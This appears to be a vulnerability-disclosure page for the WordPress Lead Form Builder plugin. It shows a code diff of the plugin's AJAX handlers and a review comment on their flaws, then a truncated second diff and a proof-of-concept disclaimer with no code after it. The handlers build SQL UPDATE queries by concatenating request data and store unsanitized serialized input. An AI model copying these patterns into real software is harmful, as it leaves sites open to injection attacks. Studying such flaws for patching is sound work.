-        }
-        echo esc_html(get_option('lf-remember-me-show-lead'));
-        die();
-    }
-}
-add_action('wp_ajax_RememberMeThisForm', 'lfb_RememberMeThisForm');
-
-
-/*
- * Save Email Settings
- */
-
-
-
-function lfb_emailsettings_sanitize($email_settings)
-{
-
-    $email_settings['from'] = sanitize_email($email_settings['from']);
-    $email_settings['header'] = sanitize_text_field($email_settings['header']);
-    $email_settings['subject'] = sanitize_text_field($email_settings['subject']);
-    $email_settings['message'] = sanitize_textarea_field($email_settings['message']);
-    $email_settings['user-email-setting-option'] = sanitize_text_field($email_settings['user-email-setting-option']);
-    $email_settings['form-id'] = intval($email_settings['form-id']);
-    return $email_settings;
-}
-
-function lfb_SaveUserEmailSettings()
-{
-    unset($_POST['action']);
-    $mailArr = array();
-
-    $nonce = $_REQUEST['ues_nonce'];
-    // Get all the user roles as an array.
-    if (isset($_POST['user_email_setting'])  && current_user_can('manage_options') && wp_verify_nonce($nonce, 'ues-nonce')) {
-
-        $mailArr['user_email_setting'] = lfb_emailsettings_sanitize($_POST['user_email_setting']);
-
-        $email_setting = maybe_serialize($mailArr);
-        $this_form_id = intval($_POST['user_email_setting']['form-id']);
-        global $wpdb;
-        $table_name = LFB_FORM_FIELD_TBL;
-        $update_query = "update " . LFB_FORM_FIELD_TBL . " set usermail_setting='" . $email_setting . "' where id='" . $this_form_id . "'";
-        $th_save_db = new LFB_SAVE_DB($wpdb);
-        $update_leads = $th_save_db->lfb_update_form_data($update_query);
-        if ($update_leads) {
-            echo esc_html("updated");
-        }
-    }
-    die();
-}
-add_action('wp_ajax_SaveUserEmailSettings', 'lfb_SaveUserEmailSettings');
+<?php
+if (!defined('ABSPATH')) exit; // Exit if accessed directly
+
+
+
+/*
+ * Save Lead collecting method
+ */
+function lfb_save_lead_settings()
+{
+    $nonce = $_REQUEST['lrv_nonce_verify'];
+    // Get all the user roles as an array.
+    if (isset($_POST['action-lead-setting'])  && current_user_can('manage_options') && wp_verify_nonce($nonce, 'lrv-nonce')) {
+
+    $data_recieve_method = intval($_POST['data-recieve-method']);
+    $this_form_id = intval($_POST['action-lead-setting']);
+    global $wpdb;
+    $table_name = LFB_FORM_FIELD_TBL;
+    $update_query = "update " . LFB_FORM_FIELD_TBL . " set storeType='" . $data_recieve_method . "' where id='" . $this_form_id . "'";
+    $th_save_db = new LFB_SAVE_DB($wpdb);
+    $update_leads = $th_save_db->lfb_update_form_data($update_query);
+    if ($update_leads) {
+        esc_html_e('updated', 'lead-form-builder');
+    }
+
+    die();
+
+}
+}
+
+add_action('wp_ajax_SaveLeadSettings', 'lfb_save_lead_settings');
+
+/*
+ * Save Email Settings
+ */
+
+function lfb_save_email_settings()
+{
+
+    $nonce = $_REQUEST['aes_nonce'];
+    // Get all the user roles as an array.
+    if (isset($_POST['email_setting']['form-id'])  && current_user_can('manage_options') && wp_verify_nonce($nonce, 'aes-nonce')) {
+
+    global $wpdb;
+    $email_setting = array();
+    $this_form_id = intval($_POST['email_setting']['form-id']);
+    $email_setting['email_setting'] = isset($_POST['email_setting']) ? $_POST['email_setting'] : '';
+    $serialize = maybe_serialize($email_setting);
+    $table_name = LFB_FORM_FIELD_TBL;
+    $update_query = "update " . LFB_FORM_FIELD_TBL . " set mail_setting='" . $serialize . "' where id='" . $this_form_id . "'";
+    $th_save_db = new LFB_SAVE_DB($wpdb);
+    $update_leads = $th_save_db->lfb_update_form_data($update_query);
+    if ($update_leads) {
+        esc_html_e('updated', 'lead-form-builder');
+    }
+    die();
+    }
+}
+
+add_action('wp_ajax_SaveEmailSettings', 'lfb_save_email_settings');
+
+/*
+ * Save captcha Keys
+ */
+
+function lfb_save_captcha_settings()
+{
+    $nonce = $_POST['captcha_nonce'];
+
+    if (isset($_POST['captcha-keys'])  && current_user_can('manage_options') && wp_verify_nonce($nonce, 'captcha-nonce')) {
+
+    $captcha_setting_sitekey = sanitize_text_field($_POST['captcha-setting-sitekey']);
+    $captcha_setting_secret = sanitize_text_field($_POST['captcha-setting-secret']);
+
+    if (get_option('captcha-setting-sitekey') !== false) {
+        update_option('captcha-setting-sitekey', $captcha_setting_sitekey);
+        update_option('captcha-setting-secret', $captcha_setting_secret);
+    } else {
+        add_option('captcha-setting-sitekey', $captcha_setting_sitekey);
+        add_option('captcha-setting-secret', $captcha_setting_secret);
+    }
+}
+    die();
+}
+
+add_action('wp_ajax_SaveCaptchaSettings', 'lfb_save_captcha_settings');
+
+/*
+ * Delete Leads From Back-end
+ */
+function lfb_delete_leads_backend()
+{
+
+    $nonce = $_REQUEST['_lfbnonce'];
+    // Get all the user roles as an array.
+
+    $check = false;
+    if (isset($_POST['lead_id'])  && current_user_can('manage_options') && wp_verify_nonce($nonce, 'lfb-nonce-rm')) {
+        $check = true;
+
+        $this_lead_id = intval($_POST['lead_id']);
+        global $wpdb;
+        $table_name = LFB_FORM_DATA_TBL;
+
+        $update_query = $wpdb->prepare(" DELETE FROM $table_name WHERE id = %d ", $this_lead_id);
+
+        $th_save_db = new LFB_SAVE_DB($wpdb);
+        $update_leads = $th_save_db->lfb_delete_form($update_query);
+        echo esc_html($update_leads);
+    }
+
+    echo $check;
+}
+
+add_action('wp_ajax_delete_leads_backend', 'lfb_delete_leads_backend');
+
+/*
+ * Save captcha status for form ON/OFF
+ */
+
+function lfb_save_captcha_option()
+{
+    $nonce = $_POST['captcha_nonce'];
+if (isset($_POST['captcha_on_off_form_id'])  && current_user_can('manage_options') && wp_verify_nonce($nonce, 'captcha-nonce')) {
+
+    $captcha_option = sanitize_text_field($_POST['captcha-on-off-setting']);
+    $this_form_id = intval($_POST['captcha_on_off_form_id']);
+    global $wpdb;
+    $table_name = LFB_FORM_FIELD_TBL;
+    $update_query = "update " . LFB_FORM_FIELD_TBL . " set captcha_status='" . $captcha_option . "' where id='" . $this_form_id . "'";
+    $th_save_db = new LFB_SAVE_DB($wpdb);
+    $update_leads = $th_save_db->lfb_update_form_data($update_query);
+    if ($update_leads) {
+        esc_html_e('updated', 'lead-form-builder');
+    }
+}
+    die();
+}
+
+add_action('wp_ajax_SaveCaptchaOption', 'lfb_save_captcha_option');
+
+/*
+ * Show all Leads column on Lead Page Based on form selection
+ */
+
+function lfb_ShowAllLeadThisForm()
+{
+    if ( ! current_user_can( 'manage_options' ) ) {
+        return false;
+    }
+
+    if ((isset($_POST['form_id']) && ($_POST['form_id'] != '')) || (isset($_GET['form_id']) && ($_GET['form_id'] != ''))) {
+
+        global $wpdb;
+        $table_name = LFB_FORM_DATA_TBL;
+        $th_save_db = new LFB_SAVE_DB($wpdb);
+        $nonce = wp_create_nonce('lfb-nonce-rm');
+        $showLeadsObj = new LFB_Show_Leads();
+        $start = 0;
+        $limit = 10;
+        $detail_view  = '';
+        $slectleads = false;
+
+        if (isset($_GET['id'])) {
+            $id = intval($_GET['id']);
+            $start = ($id - 1) * $limit;
+            $form_id = intval($_GET['form_id']);
+            $sn_counter = $start;
+        } else {
+            $id = 1;
+            $form_id = intval($_POST['form_id']);
+            $sn_counter = 0;
+        }
+        if (isset($_GET['detailview'])) {
+            $detail_view = sanitize_text_field($_GET['detailview']);
+        }
+
+        if (isset($_POST['slectleads'])) {
+            $slectleads = sanitize_text_field($_POST['slectleads']);
+        }
+
+        $getArray = $th_save_db->lfb_get_all_view_leads_db($form_id, $start);
+        $posts          = $getArray['posts'];
+        $rows           = $getArray['rows'];
+        $limit          = $getArray['limit'];
+        $fieldData       = $getArray['fieldId'];
+        $tableHead  = '';
+        $headcount = 1;
+        $leadscount = 5;
+
+        foreach ($fieldData as $fieldkey => $fieldvalue) {
+            // Html Field removed
+            $pos = strpos($fieldkey, 'htmlfield_');
+            if ($pos !== false) {
+                continue;
+            }
+
+            if ($headcount < 6 && $slectleads) {
+                $tableHead  .= '<th>' . esc_html($fieldvalue) . '</th>';
+            } elseif (!$slectleads) {
+
+                $tableHead  .= '<th>' . esc_html($fieldvalue) . '</th>';
+
+                $leadscount =  $headcount;
+            }
+            $fieldIdNew[] = $fieldkey;
+            $headcount++;
+
+            // } else{ break; }
+        }
+
+        if (!empty($posts)) {
+            $entry_counter = 0;
+            $table_body = '';
+            $table_head = '';
+            $popupTab   = '';
+
+            if ($headcount >= 6 && $leadscount == 5) {
+                $table_head .= '<th></th><th> . . . </th><th><input type="button" onclick="show_all_leads(' . intval($id) . ',' . intval($form_id) . ')" value="Show all Columns"></th>';
+            }
+
+            foreach ($posts as $results) {
+                $table_row = '';
+                // $table_head = '';
+                $sn_counter++;
+                $row_size_limit = 0;
+                $form_data = $results->form_data;
+                $lead_id = $results->id;
+                $lead_date = date("jS F Y", strtotime($results->date));
+                $form_data = maybe_unserialize($form_data);
+                unset($form_data['hidden_field']);
+                unset($form_data['action']);
+                $entry_counter++;
+                $complete_data = '';
+                $popup_data_val = '';
+                $date_td = '<td><b>' . $lead_date . '</b></td>';
+
+
+                $returnData = $th_save_db->lfb_lead_form_value($form_data, $fieldIdNew, $fieldData, $leadscount);
+                $table_row .= $returnData['table_row'];
+                $table_row .= $date_td;
+
+                foreach ($form_data as $form_data_key => $form_data_value) {
+                    $row_size_limit++;
+
+                    if (($detail_view != 1) && ($row_size_limit == 6) && $leadscount == 5) {
+                        $table_row .= '<td>. . .</td><td><a href="#lf-openModal-' . $lead_id . '" value="view">view</a></td>';
+                    }
+                }
+
+                $complete_data .= "<table><tr><th>Field</th><th>Value</th></tr>" . $returnData['table_popup'] . "</table>";
+
+                /****/
+                $popupTab .= '<div id="lf-openModal-' . $lead_id . '" class="lf-modalDialog">
+                          <div class="lfb-popup-leads" ><a href="#lf-close" title="Close" class="lf-close">X</a>' . $complete_data . '
+                          </div>
+                          </div>';
+
+                //  $complete_data .=$returnData['table_popup']."</table>";
+
+                $table_body .= '<tbody id="lead-id-' . $lead_id . '">';
+
+                $table_body  .= '<tr><td><span class="lead-count">' . $sn_counter . '</span><a class="lead-remove" onclick="delete_this_lead(' . $lead_id . ','' . $nonce . '')" ><i class="fa fa-trash" aria-hidden="true"></i></a></td>' . $table_row . '</tr>';
+            }
+
+            $thHead = '<div class="wrap" id="form-leads-show"><table class="show-leads-table wp-list-table widefat fixed" id="show-leads-table" ><thead><tr><th>Action</th>' . $tableHead . '<th>Date</th>' . $table_head . '</tr></thead>';
+
+            echo wp_kses($thHead . $table_body . '</tbody></table>' . $popupTab, $showLeadsObj->expanded_alowed_tags());
+
+            $total = ceil($rows / $limit);
+            if ($headcount >= 6 && $leadscount == 5) {
+
+                if ($id > 1) {
+                    echo "<a href=''  onclick='lead_pagi_view(" . intval($id - 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-right'></i></a>";
+                }
+                if ($id != $total) {
+                    echo "<a href='' onclick='lead_pagi_view(" . intval($id + 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-left'></i></a>";
+                }
+                echo "<ul class='page'>";
+                for ($i = 1; $i <= $total; $i++) {
+                    if ($i == $id) {
+                        echo "<li class='lf-current'><a href='#'>" . intval($i) . "</a></li>";
+                    } else {
+                        echo "<li><a href='' onclick='lead_pagi_view(" . intval($i) . "," . intval($form_id) . ")'>" . intval($i) . "</a></li>";
+                    }
+                }
+                echo '</ul>';
+            } else {
+
+                if ($id > 1) {
+                    echo "<a href=''  onclick='lead_pagination(" . intval($id - 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-right'></i></a>";
+                }
+                if ($id != $total) {
+                    echo "<a href='' onclick='lead_pagination(" . intval($id + 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-left'></i></a>";
+                }
+                echo "<ul class='page'>";
+                for ($i = 1; $i <= $total; $i++) {
+                    if ($i == $id) {
+                        echo "<li class='lf-current'><a href='#'>" . intval($i) . "</a></li>";
+                    } else {
+                        echo "<li><a href='' onclick='lead_pagination(" . intval($i) . "," . intval($form_id) . ")'>" . intval($i) . "</a></li>";
+                    }
+                }
+                echo '</ul>';
+            }
+        } else {
+            esc_html_e('Opps No lead...!!', 'lead-form-builder');
+        }
+        die();
+    }
+}
+
+add_action('wp_ajax_ShowAllLeadThisForm', 'lfb_ShowAllLeadThisForm');
+
+
+
+function lfb_ShowLeadPagi()
+{
+    if ( ! current_user_can( 'manage_options' ) ) {
+        return false;
+    }
+
+    if ((isset($_POST['form_id']) && ($_POST['form_id'] != '')) || (isset($_GET['form_id']) && ($_GET['form_id'] != ''))) {
+        global $wpdb;
+        $table_name = LFB_FORM_DATA_TBL;
+        $th_save_db = new LFB_SAVE_DB($wpdb);
+        $showLeadsObj = new LFB_Show_Leads();
+        $nonce = wp_create_nonce('lfb-nonce-rm');
+        $start = 0;
+        $limit = 10;
+        $detail_view = '';
+
+        if (isset($_GET['id'])) {
+            $id = intval($_GET['id']);
+            $start = ($id - 1) * $limit;
+            $form_id = intval($_GET['form_id']);
+            $sn_counter = $start;
+        } else {
+            $id = 1;
+            $form_id = intval($_POST['form_id']);
+            $sn_counter = 0;
+        }
+        if (isset($_GET['detailview'])) {
+            $detail_view = isset($_GET['detailview']);
+        }
+
+        $getArray = $th_save_db->lfb_get_all_view_leads_db($form_id, $start);
+        $posts          = $getArray['posts'];
+        $rows           = $getArray['rows'];
+        $limit          = $getArray['limit'];
+        $fieldData       = $getArray['fieldId'];
+        $tableHead  = '';
+        $headcount = 1;
+
+        foreach ($fieldData as $fieldkey => $fieldvalue) {
+            if ($headcount < 6) {
+                $tableHead  .= '<th>' . esc_html($fieldvalue) . '</th>';
+            }
+            $fieldIdNew[] = $fieldkey;
+            // } else{ break; }
+            $headcount++;
+        }
+        if (!empty($posts)) {
+            $entry_counter = 0;
+            $table_body = '';
+            $table_head = '';
+            $popupTab   = '';
+
+            if ($headcount >= 6) {
+                $table_head .= '<th> . . . </th><th><input type="button" onclick="show_all_leads(' . $id . ',' . $form_id . ')" value="Show all Columns"></th>';
+            }
+
+            foreach ($posts as $results) {
+                $table_row = '';
+                $sn_counter++;
+                $row_size_limit = 0;
+                $form_data = $results->form_data;
+                $lead_id = $results->id;
+                $form_data = maybe_unserialize($form_data);
+                unset($form_data['hidden_field']);
+                unset($form_data['action']);
+                $entry_counter++;
+                $complete_data = '';
+                $popup_data_val = '';
+
+                $returnData = $th_save_db->lfb_lead_form_value($form_data, $fieldIdNew, $fieldData, 5);
+                $table_row .= $returnData['table_row'];
+
+                foreach ($form_data as $form_data_key => $form_data_value) {
+                    $row_size_limit++;
+
+                    if (($detail_view != 1) && ($row_size_limit == 6)) {
+                        $table_row .= '<td>. . .</td><td><a href="#lf-openModal-' . $lead_id . '" value="view">view</a></td>';
+                    }
+                }
+
+                $complete_data .= "<table><tr><th>Field</th><th>Value</th></tr>" . $returnData['table_popup'] . "</table>";
+
+                /****/
+                $popupTab .= '<div id="lf-openModal-' . $lead_id . '" class="lf-modalDialog">
+                          <div class="lfb-popup-leads" ><a href="#lf-close" title="Close" class="lf-close">X</a>' . $complete_data . '
+                          </div>
+                          </div>';
+                /****/
+                $table_body .= '<tbody id="lead-id-' . $lead_id . '">';
+
+                $table_body  .= '<tr><td><span class="lead-count">' . $sn_counter . '</span><a class="lead-remove" onclick="delete_this_lead(' . $lead_id . ','' . $nonce . '')" ><i class="fa fa-trash" aria-hidden="true"></i></a></td>' . $table_row . '</tr>';
+            }
+
+            $thHead = '<div class="wrap" id="form-leads-show"><table class="show-leads-table wp-list-table widefat fixed" id="show-leads-table" ><thead><tr><th>Action</th>' . $tableHead . $table_head . '</tr></thead>';
+
+            echo wp_kses($thHead . $table_body . '</tbody></table>' . $popupTab, $showLeadsObj->expanded_alowed_tags());
+
+            $total = ceil($rows / $limit);
+            if ($id > 1) {
+                echo "<a href=''  onclick='lead_pagi_view(" . intval($id - 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-right'></i></a>";
+            }
+            if ($id != $total) {
+                echo "<a href='' onclick='lead_pagi_view(" . intval($id + 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-left'></i></a>";
+            }
+            echo "<ul class='page'>";
+            for ($i = 1; $i <= $total; $i++) {
+                if ($i == $id) {
+                    echo "<li class='lf-current'><a href='#'>" . intval($i) . "</a></li>";
+                } else {
+                    echo "<li><a href='' onclick='lead_pagi_view(" . intval($i) . "," . intval($form_id) . ")'>" . intval($i) . "</a></li>";
+                }
+            }
+            echo '</ul>';
+        } else {
+            esc_html_e('Opps No lead...!!', 'lead-form-builder');
+        }
+        die();
+    }
+}
+add_action('wp_ajax_ShowLeadPagi', 'lfb_ShowLeadPagi');
+
+/*
+ * Show Leads on Lead Page Based on form selection
+ */
+
+function lfb_ShowAllLeadThisFormDate()
+{
+
+
+    	if ( ! current_user_can( 'manage_options' ) ) {
+		return false;
+	}
+
+
+    if ((isset($_POST['form_id']) && ($_POST['form_id'] != '')) || (isset($_GET['form_id']) && ($_GET['form_id'] != ''))) {
+        global $wpdb;
+        $nonce = wp_create_nonce('lfb-nonce-rm');
+        $table_name = LFB_FORM_DATA_TBL;
+        $th_save_db = new LFB_SAVE_DB($wpdb);
+        $showLeadsObj = new LFB_Show_Leads();
+        $start = 0;
+        $limit = 10;
+        $detail_view = '';
+
+        if (isset($_GET['id'])) {
+            $id = intval($_GET['id']);
+            $datewise = sanitize_text_field($_GET['datewise']);
+            $start = ($id - 1) * $limit;
+            $form_id = intval($_GET['form_id']);
+            $sn_counter = $start;
+        } else {
+            $id = 1;
+            $datewise = '';
+            $sn_counter = 0;
+        }
+        if (isset($_GET['detailview'])) {
+            $detail_view = sanitize_text_field($_GET['detailview']);
+        }
+        $getArray =  $th_save_db->lfb_get_all_view_date_leads_db($form_id, $datewise, $start);
+
+        $posts          = $getArray['posts'];
+        $rows           = $getArray['rows'];
+        $limit          = $getArray['limit'];
+        $fieldData       = $getArray['fieldId'];
+        $fieldIdNew     = array();
+        $headcount = 1;
+
+        $tableHead  = '';
+
+
+        foreach ($fieldData as $fieldkey => $fieldvalue) {
+            if ($headcount < 6) {
+                $tableHead  .= '<th>' . esc_html($fieldvalue) . '</th>';
+            }
+            $fieldIdNew[] = $fieldkey;
+            // } else{ break; }
+            $headcount++;
+        }
+
+        if (!empty($posts)) {
+            $entry_counter = 0;
+            $value1 = 0;
+            $table_body = '';
+            $table_head = '';
+            $popupTab   = '';
+
+
+            if ($headcount >= 6) {
+                $table_head .= '<th><input type="button" onclick="show_all_leads(' . $id . ',' . $form_id . ')" value="Show all fields"></th>';
+            }
+
+            foreach ($posts as $results) {
+                $table_row = '';
+                $sn_counter++;
+                $row_size_limit = 0;
+                $form_data = $results->form_data;
+                $lead_id = $results->id;
+                $form_data = maybe_unserialize($form_data);
+                unset($form_data['hidden_field']);
+                unset($form_data['action']);
+                $entry_counter++;
+                $complete_data = '';
+                $popup_data_val = '';
+
+                $returnData = $th_save_db->lfb_lead_form_value($form_data, $fieldIdNew, $fieldData, 5);
+                $table_row .= $returnData['table_row'];
+
+
+
+                foreach ($form_data as $form_data_key => $form_data_value) {
+                    $row_size_limit++;
+
+                    if (($detail_view != 1) && ($row_size_limit == 6)) {
+                        $table_row .= '<td>. . . . .</td><td><a href="#lf-openModal-' . $lead_id . '" value="view">view</a></td>';
+                    }
+                }
+
+                $complete_data .= "<table><tr><th>Field</th><th>Value</th></tr>" . $returnData['table_popup'] . "</table>";
+
+                /****/
+                $popupTab .= '<div id="lf-openModal-' . $lead_id . '" class="lf-modalDialog">
+                          <div class="lfb-popup-leads" ><a href="#lf-close" title="Close" class="lf-close">X</a>' . $complete_data . '
+                          </div>
+                          </div>';
+                /****/
+                $table_body .= '<tbody id="lead-id-' . $lead_id . '">';
+
+                $table_body  .= '<tr><td><span class="lead-count">' . $sn_counter . '</span><a class="lead-remove" onclick="delete_this_lead(' . $lead_id . ','' . $nonce . '')" ><i class="fa fa-trash" aria-hidden="true"></i></a></td>' . $table_row . '</tr>';
+            }
+
+            $thHead = '<div class="wrap" id="form-leads-show"><table class="show-leads-table wp-list-table widefat fixed" id="show-leads-table" ><thead><tr><th>Action</th>' . $tableHead . $table_head . '</tr></thead>';
+
+            echo wp_kses($thHead . $table_body . '</tbody></table>' . $popupTab, $showLeadsObj->expanded_alowed_tags());
+
+            $rows = count($rows);
+            $total = ceil($rows / $limit);
+            if ($id > 1) {
+                echo "<a href=''  onclick='lead_pagination_datewise(" . intval($id - 1) . "," . intval($form_id) . ","" . esc_attr($datewise) . "");' class='button'><i class='fa fa-chevron-right'></i></a>";
+            }
+            if ($id != $total) {
+                echo "<a href='' onclick='lead_pagination_datewise(" . intval($id + 1) . "," . intval($form_id) . ","" . esc_attr($datewise) . "");' class='button'><i class='fa fa-chevron-left'></i></a>";
+            }
+            echo "<ul class='page'>";
+            for ($i = 1; $i <= $total; $i++) {
+                if ($i == $id) {
+                    echo "<li class='lf-current'><a>" . intval($i) . "</a></li>";
+                } else {
+                    echo "<li><a href='' onclick='lead_pagination_datewise(" . intval($i) . "," . intval($form_id) . ","" . esc_attr($datewise) . "");'>" . intval($i) . "</a></li>";
+                }
+            }
+            echo '</ul>';
+        } else {
+            esc_html_e('Opps No lead...!!', 'lead-form-builder');
+        }
+        die();
+    }
+}
+add_action('wp_ajax_ShowAllLeadThisFormDate', 'lfb_ShowAllLeadThisFormDate');
+
+/*
+ * Save from Data from front-end
+ */
+
+function lfb_form_name_email_filter($form_data)
+{
+    $name_email = array();
+    $e = false;
+    $n = false;
+    foreach ($form_data as $key => $value) {
+        $email = strpos($key, 'email_');
+        $name = strpos($key, 'name_');
+        if ($email !== false) {
+            $name_email['email'] = $value;
+            $e = true;
+        } elseif ($name !== false) {
+            $name_email['name'] = $value;
+            $n = true;
+        }
+        if ($e === true && $n === true) {
+            break;
+        }
+    }
+    return $name_email;
+}
+
+function lfb_lead_sanitize($leads)
+{
+    if (is_array($leads)) {
+        foreach ($leads as $key => $value) {
+            $rKey = preg_replace("/[^a-zA-Z]+/", "", $key);
+            if ($rKey === 'name' || $rKey === 'text' || $rKey === 'radio' || $rKey === 'option') {
+                $leads[$key] = sanitize_text_field($value);
+            } elseif ($rKey === 'email') {
+                $leads[$key] = sanitize_email($value);
+            } elseif ($rKey === 'number') {
+                $leads[$key] = intval($value);
+            } elseif ($rKey === 'message' || $rKey === 'textarea') {
+                $leads[$key] = sanitize_textarea_field($value);
+            } elseif ($rKey === 'date' || $rKey === 'dob') {
+                $leads[$key] = sanitize_text_field($value);
+            } elseif ($rKey === 'url') {
+                $leads[$key] = esc_url_raw($value);
+            } elseif ($rKey === 'checkbox') {
+
+                foreach ($value as $ckey => $cvalue) {
+                    $value[$ckey] = sanitize_text_field($cvalue);
+                }
+                $leads[$key] = $value;
+            } else {
+                // Catch-all: sanitize any unrecognized field types (including htmlfield_*)
+                if (is_array($value)) {
+                    foreach ($value as $ckey => $cvalue) {
+                        $value[$ckey] = sanitize_text_field($cvalue);
+                    }
+                    $leads[$key] = $value;
+                } else {
+                    $leads[$key] = sanitize_text_field($value);
+                }
+            }
+        } // end foreach
+
+        return $leads;
+    }
+}
+
+function lfb_Save_Form_Data()
+{
+
+    if (isset($_POST['fdata']) && wp_verify_nonce($_POST['_wpnonce'], 'lfb_front_nonce' )) {
+        wp_parse_str($_POST['fdata'], $fromData);
+
+        $form_id = intval($fromData['hidden_field']);
+        unset($fromData['g-recaptcha-response']);
+        unset($fromData['action']);
+        unset($fromData['hidden_field']);
+
+        $en = lfb_form_name_email_filter($fromData);
+
+
+        if ((isset($en['email'])) && ($en['email'] != '')) {
+            $user_emailid = sanitize_email($en['email']);
+        } else {
+            $user_emailid = esc_html__('invalid_email', 'lead-form-builder');
+        }
+        $sanitize_leads =  lfb_lead_sanitize($fromData);
+        $form_data = maybe_serialize($sanitize_leads);
+
+        $lf_store   = new LFB_LeadStoreType();
+        $th_save_db = new LFB_SAVE_DB();
+
+        $lf_store->lfb_mail_type($form_id, $form_data, $th_save_db, $user_emailid);
+    }else{
+        echo esc_html__('INVAILD','lead-form-builder');
+    }
+    die();
+}
+
+add_action('wp_ajax_Save_Form_Data', 'lfb_Save_Form_Data');
+add_action('wp_ajax_nopriv_Save_Form_Data', 'lfb_Save_Form_Data');
+
+function lfb_verifyFormCaptcha()
+{
+    if ((isset($_POST['captcha_res'])) && (!empty($_POST['captcha_res']))) {
+        $captcha = stripslashes($_POST['captcha_res']);
+        $secret_key = get_option('captcha-setting-secret');
+        $response = wp_remote_post(
+            'https://www.google.com/recaptcha/api/siteverify',
+            array(
+                'method' => 'POST',
+                'body' => array(
+                    'secret' => $secret_key,
+                    'response' => $captcha
+                )
+            )
+        );
+        $reply_obj = json_decode(wp_remote_retrieve_body($response));
+        if (isset($reply_obj->success) && $reply_obj->success == 1) {
+            esc_html_e('Yes', 'lead-form-builder');
+        } else {
+            esc_html_e('No', 'lead-form-builder');
+        }
+    } else {
+        esc_html_e('Invalid', 'lead-form-builder');
+    }
+    die();
+}
+add_action('wp_ajax_verifyFormCaptcha', 'lfb_verifyFormCaptcha');
+add_action('wp_ajax_nopriv_verifyFormCaptcha', 'lfb_verifyFormCaptcha');
+
+function lfb_RememberMeThisForm()
+{
+    $nonce = $_POST['rem_nonce'];
+
+    if (isset($_POST['form_id'])  && current_user_can('manage_options') && wp_verify_nonce($nonce, 'rem-nonce')) {
+
+        $remember_me = intval($_POST['form_id']);
+        if (get_option('lf-remember-me-show-lead') !== false) {
+            update_option('lf-remember-me-show-lead', $remember_me);
+        } else {
+            add_option('lf-remember-me-show-lead', $remember_me);
+        }
+        echo esc_html(get_option('lf-remember-me-show-lead'));
+        die();
+    }
+}
+add_action('wp_ajax_RememberMeThisForm', 'lfb_RememberMeThisForm');
+
+
+/*
+ * Save Email Settings
+ */
+
+
+
+function lfb_emailsettings_sanitize($email_settings)
+{
+
+    $email_settings['from'] = sanitize_email($email_settings['from']);
+    $email_settings['header'] = sanitize_text_field($email_settings['header']);
+    $email_settings['subject'] = sanitize_text_field($email_settings['subject']);
+    $email_settings['message'] = sanitize_textarea_field($email_settings['message']);
+    $email_settings['user-email-setting-option'] = sanitize_text_field($email_settings['user-email-setting-option']);
+    $email_settings['form-id'] = intval($email_settings['form-id']);
+    return $email_settings;
+}
+
+function lfb_SaveUserEmailSettings()
+{
+    unset($_POST['action']);
+    $mailArr = array();
+
+    $nonce = $_REQUEST['ues_nonce'];
+    // Get all the user roles as an array.
+    if (isset($_POST['user_email_setting'])  && current_user_can('manage_options') && wp_verify_nonce($nonce, 'ues-nonce')) {
+
+        $mailArr['user_email_setting'] = lfb_emailsettings_sanitize($_POST['user_email_setting']);
+
+        $email_setting = maybe_serialize($mailArr);
+        $this_form_id = intval($_POST['user_email_setting']['form-id']);
+        global $wpdb;
+        $table_name = LFB_FORM_FIELD_TBL;
+        $update_query = "update " . LFB_FORM_FIELD_TBL . " set usermail_setting='" . $email_setting . "' where id='" . $this_form_id . "'";
+        $th_save_db = new LFB_SAVE_DB($wpdb);
+        $update_leads = $th_save_db->lfb_update_form_data($update_query);
+        if ($update_leads) {
+            echo esc_html("updated");
+        }
+    }
+    die();
+}
+add_action('wp_ajax_SaveUserEmailSettings', 'lfb_SaveUserEmailSettings');
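Review bot: lfb_save_email_settings stores $_POST['email_setting'] without sanitization (the request array is serialized as-is) and, like lfb_save_lead_settings, lfb_save_captcha_option and lfb_SaveUserEmailSettings, concatenates the value into an UPDATE string with no $wpdb->prepare(), while lfb_delete_leads_backend in the same file already uses prepare(); run the array through lfb_emailsettings_sanitize() and switch the four updates to $wpdb->prepare("UPDATE ... SET mail_setting = %s WHERE id = %d", ...). Two further points in this hunk: in lfb_ShowAllLeadThisFormDate the else branch (no $_GET['id']) never assigns $form_id, so a POST-only request hands an undefined variable to lfb_get_all_view_date_leads_db(); and the lead tables still emit delete_this_lead()/show_all_leads() as inline onclick attributes inside the string passed to wp_kses(..., expanded_alowed_tags()), so an allow-list strict enough to keep onclick out of stored lead values will strip the plugin's own handlers too, which argues for data-* attributes plus a delegated click listener in the admin script. Finally, the new catch-all in lfb_lead_sanitize only descends one level, so a nested array leaf reaches sanitize_text_field() as an array; a recursive helper would cover arbitrary depth.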
--- a/lead-form-builder/inc/lf-db.php
+++ b/lead-form-builder/inc/lf-db.php
@@ -1,409 +1,409 @@
-<?php
-if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
-
-if (!function_exists('lfb_plugin_activate')) {
-
- function lfb_plugin_activate() {
-  $default_form = 0;
-   global $wpdb;
-   $lead_form = $wpdb->prefix . 'lead_form';
-   $lead_form_data = $wpdb->prefix . 'lead_form_data';
-   $lead_form_extension = $wpdb->prefix . 'lead_form_extension';
-   $lead_form_options = $wpdb->prefix . 'lead_form_options';
-   $charset_collate = $wpdb->get_charset_collate();
-   if ($wpdb->get_var("SHOW TABLES LIKE '$lead_form'") != $lead_form) {
-       $sql = "CREATE TABLE  $lead_form (
-         id INT(10) NOT NULL AUTO_INCREMENT,
-         form_title VARCHAR(255) NOT NULL,
-         form_data text NOT NULL,
-         date datetime NOT NULL,
-         mail_setting text NOT NULL,
-         usermail_setting text NOT NULL,
-         multiData text NOT NULL,
-         form_skin VARCHAR(255) DEFAULT 'default' NOT NULL,
-         form_status VARCHAR(50) DEFAULT 'ACTIVE' NOT NULL,
-         captcha_status VARCHAR(255) DEFAULT 'OFF' NOT NULL,
-       

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
